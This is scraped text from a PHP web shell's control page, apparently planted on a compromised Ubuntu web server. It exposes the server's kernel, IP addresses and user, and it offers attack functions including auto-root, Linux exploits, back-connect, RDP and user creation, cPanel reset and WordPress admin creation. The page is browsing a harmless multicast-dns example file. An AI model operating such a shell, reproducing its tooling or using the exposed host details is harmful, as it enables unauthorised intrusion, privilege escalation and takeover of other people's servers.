Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
multicast-dns /
[ HOME SHELL ]
Name
Size
Permission
Action
.travis.yml
62
B
-rw-rw-rw-
LICENSE
1.05
KB
-rw-rw-rw-
README.md
4.15
KB
-rw-rw-rw-
appveyor.yml
397
B
-rw-rw-rw-
cli.js
1.37
KB
-rw-rw-rw-
example.js
788
B
-rw-rw-rw-
index.js
5.4
KB
-rw-rw-rw-
package.json
894
B
-rw-rw-rw-
test.js
7.39
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : example.js
var mdns = require('./')() mdns.on('warning', function (err) { console.log(err.stack) }) mdns.on('response', function (response) { console.log('got a response packet:', response) }) mdns.on('query', function (query) { console.log('got a query packet:', query) // iterate over all questions to check if we should respond query.questions.forEach(function (q) { if (q.type === 'A' && q.name === 'example.local') { // send an A-record response for example.local mdns.respond({ answers: [{ name: 'example.local', type: 'A', ttl: 300, data: '192.168.1.5' }] }) } }) }) // lets query for an A-record for example.local mdns.query({ questions: [{ name: 'example.local', type: 'A' }] })
Close